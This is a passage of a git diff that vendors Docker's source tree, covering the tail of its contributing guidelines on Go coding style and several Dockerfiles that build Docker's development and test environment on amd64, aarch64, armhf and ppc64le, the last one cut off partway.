+* Contact abuse@docker.com to report abuse or appeal violations. In the case of
+	appeals, we know that mistakes happen, and we'll work with you to come up with a
+	fair solution if there has been a misunderstanding.
+
+## Coding Style
+
+Unless explicitly stated, we follow all coding guidelines from the Go
+community. While some of these standards may seem arbitrary, they somehow seem
+to result in a solid, consistent codebase.
+
+It is possible that the code base does not currently comply with these
+guidelines. We are not looking for a massive PR that fixes this, since that
+goes against the spirit of the guidelines. All new contributions should make a
+best effort to clean up and make the code base better than they left it.
+Obviously, apply your best judgement. Remember, the goal here is to make the
+code base easier for humans to navigate and understand. Always keep that in
+mind when nudging others to comply.
+
+The rules:
+
+1. All code should be formatted with `gofmt -s`.
+2. All code should pass the default levels of
+   [`golint`](https://github.com/golang/lint).
+3. All code should follow the guidelines covered in [Effective
+   Go](http://golang.org/doc/effective_go.html) and [Go Code Review
+   Comments](https://github.com/golang/go/wiki/CodeReviewComments).
+4. Comment the code. Tell us the why, the history and the context.
+5. Document _all_ declarations and methods, even private ones. Declare
+   expectations, caveats and anything else that may be important. If a type
+   gets exported, having the comments already there will ensure it's ready.
+6. Variable name length should be proportional to its context and no longer.
+   `noCommaALongVariableNameLikeThisIsNotMoreClearWhenASimpleCommentWouldDo`.
+   In practice, short methods will have short variable names and globals will
+   have longer names.
+7. No underscores in package names. If you need a compound name, step back,
+   and re-examine why you need a compound name. If you still think you need a
+   compound name, lose the underscore.
+8. No utils or helpers packages. If a function is not general enough to
+   warrant its own package, it has not been written generally enough to be a
+   part of a util package. Just leave it unexported and well-documented.
+9. All tests should run with `go test` and outside tooling should not be
+   required. No, we don't need another unit testing framework. Assertion
+   packages are acceptable if they provide _real_ incremental value.
+10. Even though we call these "rules" above, they are actually just
+    guidelines. Since you've read all the rules, you now know that.
+
+If you are having trouble getting into the mood of idiomatic Go, we recommend
+reading through [Effective Go](https://golang.org/doc/effective_go.html). The
+[Go Blog](https://blog.golang.org) is also a great resource. Drinking the
+kool-aid is a lot easier than going thirsty.
diff --git a/vendor/github.com/docker/docker/Dockerfile b/vendor/github.com/docker/docker/Dockerfile
new file mode 100644
index 0000000000..ce2d702807
--- /dev/null
+++ b/vendor/github.com/docker/docker/Dockerfile
@@ -0,0 +1,246 @@
+# This file describes the standard way to build Docker, using docker
+#
+# Usage:
+#
+# # Assemble the full dev environment. This is slow the first time.
+# docker build -t docker .
+#
+# # Mount your source in an interactive container for quick testing:
+# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
+#
+# # Run the test suite:
+# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
+#
+# # Publish a release:
+# docker run --privileged \
+#  -e AWS_S3_BUCKET=baz \
+#  -e AWS_ACCESS_KEY=foo \
+#  -e AWS_SECRET_KEY=bar \
+#  -e GPG_PASSPHRASE=gloubiboulga \
+#  docker hack/release.sh
+#
+# Note: AppArmor used to mess with privileged mode, but this is no longer
+# the case. Therefore, you don't have to disable it anymore.
+#
+
+FROM debian:jessie
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+
+# Add zfs ppa
+RUN apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys E871F18B51E0147C77796AC81196BA81F6B0FC61 \
+	|| apt-key adv --keyserver hkp://pgp.mit.edu:80 --recv-keys E871F18B51E0147C77796AC81196BA81F6B0FC61
+RUN echo deb http://ppa.launchpad.net/zfs-native/stable/ubuntu trusty main > /etc/apt/sources.list.d/zfs.list
+
+# Packaged dependencies
+RUN apt-get update && apt-get install -y \
+	apparmor \
+	apt-utils \
+	aufs-tools \
+	automake \
+	bash-completion \
+	binutils-mingw-w64 \
+	bsdmainutils \
+	btrfs-tools \
+	build-essential \
+	clang \
+	cmake \
+	createrepo \
+	curl \
+	dpkg-sig \
+	gcc-mingw-w64 \
+	git \
+	iptables \
+	jq \
+	libapparmor-dev \
+	libcap-dev \
+	libltdl-dev \
+	libnl-3-dev \
+	libprotobuf-c0-dev \
+	libprotobuf-dev \
+	libsqlite3-dev \
+	libsystemd-journal-dev \
+	libtool \
+	mercurial \
+	net-tools \
+	pkg-config \
+	protobuf-compiler \
+	protobuf-c-compiler \
+	python-dev \
+	python-mock \
+	python-pip \
+	python-websocket \
+	ubuntu-zfs \
+	xfsprogs \
+	vim-common \
+	libzfs-dev \
+	tar \
+	zip \
+	--no-install-recommends \
+	&& pip install awscli==1.10.15
+# Get lvm2 source for compiling statically
+ENV LVM2_VERSION 2.02.103
+RUN mkdir -p /usr/local/lvm2 \
+	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
+		| tar -xzC /usr/local/lvm2 --strip-components=1
+# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
+
+# Compile and install lvm2
+RUN cd /usr/local/lvm2 \
+	&& ./configure \
+		--build="$(gcc -print-multiarch)" \
+		--enable-static_link \
+	&& make device-mapper \
+	&& make install_device-mapper
+# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
+
+# Configure the container for OSX cross compilation
+ENV OSX_SDK MacOSX10.11.sdk
+ENV OSX_CROSS_COMMIT a9317c18a3a457ca0a657f08cc4d0d43c6cf8953
+RUN set -x \
+	&& export OSXCROSS_PATH="/osxcross" \
+	&& git clone https://github.com/tpoechtrager/osxcross.git $OSXCROSS_PATH \
+	&& ( cd $OSXCROSS_PATH && git checkout -q $OSX_CROSS_COMMIT) \
+	&& curl -sSL https://s3.dockerproject.org/darwin/v2/${OSX_SDK}.tar.xz -o "${OSXCROSS_PATH}/tarballs/${OSX_SDK}.tar.xz" \
+	&& UNATTENDED=yes OSX_VERSION_MIN=10.6 ${OSXCROSS_PATH}/build.sh
+ENV PATH /osxcross/target/bin:$PATH
+
+# Install seccomp: the version shipped in trusty is too old
+ENV SECCOMP_VERSION 2.3.1
+RUN set -x \
+	&& export SECCOMP_PATH="$(mktemp -d)" \
+	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
+		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
+	&& ( \
+		cd "$SECCOMP_PATH" \
+		&& ./configure --prefix=/usr/local \
+		&& make \
+		&& make install \
+		&& ldconfig \
+	) \
+	&& rm -rf "$SECCOMP_PATH"
+
+# Install Go
+# IMPORTANT: If the version of Go is updated, the Windows to Linux CI machines
+#            will need updating, to avoid errors. Ping #docker-maintainers on IRC
+#            with a heads-up.
+ENV GO_VERSION 1.7.5
+RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" \
+	| tar -xzC /usr/local
+
+ENV PATH /go/bin:/usr/local/go/bin:$PATH
+ENV GOPATH /go
+
+# Compile Go for cross compilation
+ENV DOCKER_CROSSPLATFORMS \
+	linux/386 linux/arm \
+	darwin/amd64 \
+	freebsd/amd64 freebsd/386 freebsd/arm \
+	windows/amd64 windows/386 \
+	solaris/amd64
+
+# Dependency for golint
+ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3
+RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \
+	&& (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT)
+
+# Grab Go's lint tool
+ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456
+RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \
+	&& (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \
+	&& go install -v github.com/golang/lint/golint
+
+# Install CRIU for checkpoint/restore support
+ENV CRIU_VERSION 2.2
+RUN mkdir -p /usr/src/criu \
+	&& curl -sSL https://github.com/xemul/criu/archive/v${CRIU_VERSION}.tar.gz | tar -v -C /usr/src/criu/ -xz --strip-components=1 \
+	&& cd /usr/src/criu \
+	&& make \
+	&& make install-criu
+
+# Install two versions of the registry. The first is an older version that
+# only supports schema1 manifests. The second is a newer version that supports
+# both. This allows integration-cli tests to cover push/pull with both schema1
+# and schema2 manifests.
+ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd
+ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
+	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
+	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
+	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \
+	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \
+	&& rm -rf "$GOPATH"
+
+# Install notary and notary-server
+ENV NOTARY_VERSION v0.4.2
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
+	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
+		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
+		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
+	&& rm -rf "$GOPATH"
+
+# Get the "docker-py" source so we can run their integration tests
+ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
+RUN git clone https://github.com/docker/docker-py.git /docker-py \
+	&& cd /docker-py \
+	&& git checkout -q $DOCKER_PY_COMMIT \
+	&& pip install -r test-requirements.txt
+
+# Install yamllint for validating swagger.yaml
+RUN pip install yamllint==1.5.0
+
+# Install go-swagger for validating swagger.yaml
+ENV GO_SWAGGER_COMMIT c28258affb0b6251755d92489ef685af8d4ff3eb
+RUN git clone https://github.com/go-swagger/go-swagger.git /go/src/github.com/go-swagger/go-swagger \
+	&& (cd /go/src/github.com/go-swagger/go-swagger && git checkout -q $GO_SWAGGER_COMMIT) \
+	&& go install -v github.com/go-swagger/go-swagger/cmd/swagger
+
+# Set user.email so crosbymichael's in-container merge commits go smoothly
+RUN git config --global user.email 'docker-dummy@example.com'
+
+# Add an unprivileged user to be used for tests which need it
+RUN groupadd -r docker
+RUN useradd --create-home --gid docker unprivilegeduser
+
+VOLUME /var/lib/docker
+WORKDIR /go/src/github.com/docker/docker
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+
+# Let us use a .bashrc file
+RUN ln -sfv $PWD/.bashrc ~/.bashrc
+# Add integration helps to bashrc
+RUN echo "source $PWD/hack/make/.integration-test-helpers" >> /etc/bash.bashrc
+
+# Register Docker's bash completion.
+RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
+
+# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
+COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
+RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
+	buildpack-deps:jessie@sha256:25785f89240fbcdd8a74bdaf30dd5599a9523882c6dfc567f2e9ef7cf6f79db6 \
+	busybox:latest@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 \
+	debian:jessie@sha256:f968f10b4b523737e253a97eac59b0d1420b5c19b69928d35801a6373ffe330e \
+	hello-world:latest@sha256:8be990ef2aeb16dbcb9271ddfe2610fa6658d13f6dfb8bc72074cc1ca36966a7
+# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
+
+# Install tomlv, vndr, runc, containerd, tini, docker-proxy
+# Please edit hack/dockerfile/install-binaries.sh to update them.
+COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
+COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
+RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy bindata
+
+# Wrap all commands in the "docker-in-docker" script to allow nested containers
+ENTRYPOINT ["hack/dind"]
+
+# Upload docker source
+COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.aarch64 b/vendor/github.com/docker/docker/Dockerfile.aarch64
new file mode 100644
index 0000000000..6112f802f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/Dockerfile.aarch64
@@ -0,0 +1,175 @@
+# This file describes the standard way to build Docker on aarch64, using docker
+#
+# Usage:
+#
+# # Assemble the full dev environment. This is slow the first time.
+# docker build -t docker -f Dockerfile.aarch64 .
+#
+# # Mount your source in an interactive container for quick testing:
+# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
+#
+# # Run the test suite:
+# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
+#
+# Note: AppArmor used to mess with privileged mode, but this is no longer
+# the case. Therefore, you don't have to disable it anymore.
+#
+
+FROM aarch64/ubuntu:wily
+
+# Packaged dependencies
+RUN apt-get update && apt-get install -y \
+	apparmor \
+	aufs-tools \
+	automake \
+	bash-completion \
+	btrfs-tools \
+	build-essential \
+	cmake \
+	createrepo \
+	curl \
+	dpkg-sig \
+	g++ \
+	gcc \
+	git \
+	iptables \
+	jq \
+	libapparmor-dev \
+	libc6-dev \
+	libcap-dev \
+	libltdl-dev \
+	libsqlite3-dev \
+	libsystemd-dev \
+	mercurial \
+	net-tools \
+	parallel \
+	pkg-config \
+	python-dev \
+	python-mock \
+	python-pip \
+	python-websocket \
+	gccgo \
+	iproute2 \
+	iputils-ping \
+	vim-common \
+	--no-install-recommends
+
+# Get lvm2 source for compiling statically
+ENV LVM2_VERSION 2.02.103
+RUN mkdir -p /usr/local/lvm2 \
+	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
+		| tar -xzC /usr/local/lvm2 --strip-components=1
+# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
+
+# Fix platform enablement in lvm2 to support aarch64 properly
+RUN set -e \
+	&& for f in config.guess config.sub; do \
+		curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \
+	done
+# "arch.c:78:2: error: #error the arch code needs to know about your machine type"
+
+# Compile and install lvm2
+RUN cd /usr/local/lvm2 \
+	&& ./configure \
+		--build="$(gcc -print-multiarch)" \
+		--enable-static_link \
+	&& make device-mapper \
+	&& make install_device-mapper
+# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
+
+# Install seccomp: the version shipped in trusty is too old
+ENV SECCOMP_VERSION 2.3.1
+RUN set -x \
+	&& export SECCOMP_PATH="$(mktemp -d)" \
+	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
+		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
+	&& ( \
+		cd "$SECCOMP_PATH" \
+		&& ./configure --prefix=/usr/local \
+		&& make \
+		&& make install \
+		&& ldconfig \
+	) \
+	&& rm -rf "$SECCOMP_PATH"
+
+# Install Go
+# We don't have official binary tarballs for ARM64, eigher for Go or bootstrap,
+# so we use gccgo as bootstrap to build Go from source code.
+# We don't use the official ARMv6 released binaries as a GOROOT_BOOTSTRAP, because
+# not all ARM64 platforms support 32-bit mode. 32-bit mode is optional for ARMv8.
+ENV GO_VERSION 1.7.5
+RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \
+	&& cd /usr/src/go/src \
+	&& GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash
+
+ENV PATH /usr/src/go/bin:$PATH
+ENV GOPATH /go
+
+# Only install one version of the registry, because old version which support
+# schema1 manifests is not working on ARM64, we should skip integration-cli
+# tests for schema1 manifests on ARM64.
+ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
+	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
+	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
+	&& rm -rf "$GOPATH"
+
+# Install notary and notary-server
+ENV NOTARY_VERSION v0.4.2
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
+	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
+		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
+		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
+	&& rm -rf "$GOPATH"
+
+# Get the "docker-py" source so we can run their integration tests
+ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
+RUN git clone https://github.com/docker/docker-py.git /docker-py \
+	&& cd /docker-py \
+	&& git checkout -q $DOCKER_PY_COMMIT \
+	&& pip install -r test-requirements.txt
+
+# Set user.email so crosbymichael's in-container merge commits go smoothly
+RUN git config --global user.email 'docker-dummy@example.com'
+
+# Add an unprivileged user to be used for tests which need it
+RUN groupadd -r docker
+RUN useradd --create-home --gid docker unprivilegeduser
+
+VOLUME /var/lib/docker
+WORKDIR /go/src/github.com/docker/docker
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+
+# Let us use a .bashrc file
+RUN ln -sfv $PWD/.bashrc ~/.bashrc
+
+# Register Docker's bash completion.
+RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
+
+# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
+COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
+RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
+	aarch64/buildpack-deps:jessie@sha256:6aa1d6910791b7ac78265fd0798e5abd6cb3f27ae992f6f960f6c303ec9535f2 \
+	aarch64/busybox:latest@sha256:b23a6a37cf269dff6e46d2473b6e227afa42b037e6d23435f1d2bc40fc8c2828 \
+	aarch64/debian:jessie@sha256:4be74a41a7c70ebe887b634b11ffe516cf4fcd56864a54941e56bb49883c3170 \
+	aarch64/hello-world:latest@sha256:65a4a158587b307bb02db4de41b836addb0c35175bdc801367b1ac1ddeb9afda
+# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
+
+# Install tomlv, vndr, runc, containerd, tini, docker-proxy
+# Please edit hack/dockerfile/install-binaries.sh to update them.
+COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
+COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
+RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy
+
+# Wrap all commands in the "docker-in-docker" script to allow nested containers
+ENTRYPOINT ["hack/dind"]
+
+# Upload docker source
+COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.armhf b/vendor/github.com/docker/docker/Dockerfile.armhf
new file mode 100644
index 0000000000..1aebc166b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/Dockerfile.armhf
@@ -0,0 +1,182 @@
+# This file describes the standard way to build Docker on ARMv7, using docker
+#
+# Usage:
+#
+# # Assemble the full dev environment. This is slow the first time.
+# docker build -t docker -f Dockerfile.armhf .
+#
+# # Mount your source in an interactive container for quick testing:
+# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
+#
+# # Run the test suite:
+# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
+#
+# Note: AppArmor used to mess with privileged mode, but this is no longer
+# the case. Therefore, you don't have to disable it anymore.
+#
+
+FROM armhf/debian:jessie
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+
+# Packaged dependencies
+RUN apt-get update && apt-get install -y \
+	apparmor \
+	aufs-tools \
+	automake \
+	bash-completion \
+	btrfs-tools \
+	build-essential \
+	createrepo \
+	curl \
+	cmake \
+	dpkg-sig \
+	git \
+	iptables \
+	jq \
+	net-tools \
+	libapparmor-dev \
+	libcap-dev \
+	libltdl-dev \
+	libsqlite3-dev \
+	libsystemd-journal-dev \
+	libtool \
+	mercurial \
+	pkg-config \
+	python-dev \
+	python-mock \
+	python-pip \
+	python-websocket \
+	xfsprogs \
+	tar \
+	vim-common \
+	--no-install-recommends \
+	&& pip install awscli==1.10.15
+
+# Get lvm2 source for compiling statically
+ENV LVM2_VERSION 2.02.103
+RUN mkdir -p /usr/local/lvm2 \
+	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
+		| tar -xzC /usr/local/lvm2 --strip-components=1
+# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
+
+# Compile and install lvm2
+RUN cd /usr/local/lvm2 \
+	&& ./configure \
+		--build="$(gcc -print-multiarch)" \
+		--enable-static_link \
+	&& make device-mapper \
+	&& make install_device-mapper
+# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
+
+# Install Go
+ENV GO_VERSION 1.7.5
+RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \
+	| tar -xzC /usr/local
+ENV PATH /go/bin:/usr/local/go/bin:$PATH
+ENV GOPATH /go
+
+# We're building for armhf, which is ARMv7, so let's be explicit about that
+ENV GOARCH arm
+ENV GOARM 7
+
+# Dependency for golint
+ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3
+RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \
+	&& (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT)
+
+# Grab Go's lint tool
+ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456
+RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \
+	&& (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \
+	&& go install -v github.com/golang/lint/golint
+
+# Install seccomp: the version shipped in trusty is too old
+ENV SECCOMP_VERSION 2.3.1
+RUN set -x \
+	&& export SECCOMP_PATH="$(mktemp -d)" \
+	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
+		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
+	&& ( \
+		cd "$SECCOMP_PATH" \
+		&& ./configure --prefix=/usr/local \
+		&& make \
+		&& make install \
+		&& ldconfig \
+	) \
+	&& rm -rf "$SECCOMP_PATH"
+
+# Install two versions of the registry. The first is an older version that
+# only supports schema1 manifests. The second is a newer version that supports
+# both. This allows integration-cli tests to cover push/pull with both schema1
+# and schema2 manifests.
+ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd
+ENV REGISTRY_COMMIT cb08de17d74bef86ce6c5abe8b240e282f5750be
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
+	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
+	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
+	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \
+	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
+		go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \
+	&& rm -rf "$GOPATH"
+
+# Install notary and notary-server
+ENV NOTARY_VERSION v0.4.2
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
+	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
+		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
+	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
+		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
+	&& rm -rf "$GOPATH"
+
+# Get the "docker-py" source so we can run their integration tests
+ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
+RUN git clone https://github.com/docker/docker-py.git /docker-py \
+	&& cd /docker-py \
+	&& git checkout -q $DOCKER_PY_COMMIT \
+	&& pip install -r test-requirements.txt
+
+# Set user.email so crosbymichael's in-container merge commits go smoothly
+RUN git config --global user.email 'docker-dummy@example.com'
+
+# Add an unprivileged user to be used for tests which need it
+RUN groupadd -r docker
+RUN useradd --create-home --gid docker unprivilegeduser
+
+VOLUME /var/lib/docker
+WORKDIR /go/src/github.com/docker/docker
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+
+# Let us use a .bashrc file
+RUN ln -sfv $PWD/.bashrc ~/.bashrc
+
+# Register Docker's bash completion.
+RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
+
+# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
+COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
+RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
+	armhf/buildpack-deps:jessie@sha256:ca6cce8e5bf5c952129889b5cc15cd6aa8d995d77e55e3749bbaadae50e476cb \
+	armhf/busybox:latest@sha256:d98a7343ac750ffe387e3d514f8521ba69846c216778919b01414b8617cfb3d4 \
+	armhf/debian:jessie@sha256:4a2187483f04a84f9830910fe3581d69b3c985cc045d9f01d8e2f3795b28107b \
+	armhf/hello-world:latest@sha256:161dcecea0225975b2ad5f768058212c1e0d39e8211098666ffa1ac74cfb7791
+# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
+
+# Install tomlv, vndr, runc, containerd, tini, docker-proxy
+# Please edit hack/dockerfile/install-binaries.sh to update them.
+COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
+COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
+RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy
+
+ENTRYPOINT ["hack/dind"]
+
+# Upload docker source
+COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.ppc64le b/vendor/github.com/docker/docker/Dockerfile.ppc64le
new file mode 100644
index 0000000000..1f9f5006ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/Dockerfile.ppc64le
@@ -0,0 +1,188 @@
+# This file describes the standard way to build Docker on ppc64le, using docker
+#
+# Usage:
+#
+# # Assemble the full dev environment. This is slow the first time.
+# docker build -t docker -f Dockerfile.ppc64le .
+#
+# # Mount your source in an interactive container for quick testing:
+# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
+#
+# # Run the test suite:
+# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
+#
+# Note: AppArmor used to mess with privileged mode, but this is no longer
+# the case. Therefore, you don't have to disable it anymore.
+#
+
+FROM ppc64le/debian:jessie
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+
+# Packaged dependencies
+RUN apt-get update && apt-get install -y \
+	apparmor \
+	aufs-tools \
+	automake \
+	bash-completion \
+	btrfs-tools \
+	build-essential \
+	cmake \
+	createrepo \
+	curl \
+	dpkg-sig \
+	git \
+	iptables \
+	jq \
+	net-tools \
+	libapparmor-dev \
+	libcap-dev \
+	libltdl-dev \
+	libsqlite3-dev \
+	libsystemd-journal-dev \
+	libtool \
+	mercurial \
+	pkg-config \
+	python-dev \
+	python-mock \
+	python-pip \
+	python-websocket \
+	xfsprogs \
+	tar \
+	vim-common \
+	--no-install-recommends
+
+# Get lvm2 source for compiling statically
+ENV LVM2_VERSION 2.02.103
+RUN mkdir -p /usr/local/lvm2 \
+	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
+		| tar -xzC /usr/local/lvm2 --strip-components=1
+# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
+
+# Fix platform enablement in lvm2 to support ppc64le properly
+RUN set -e \
+	&& for f in config.guess config.sub; do \
+		curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \
+	done
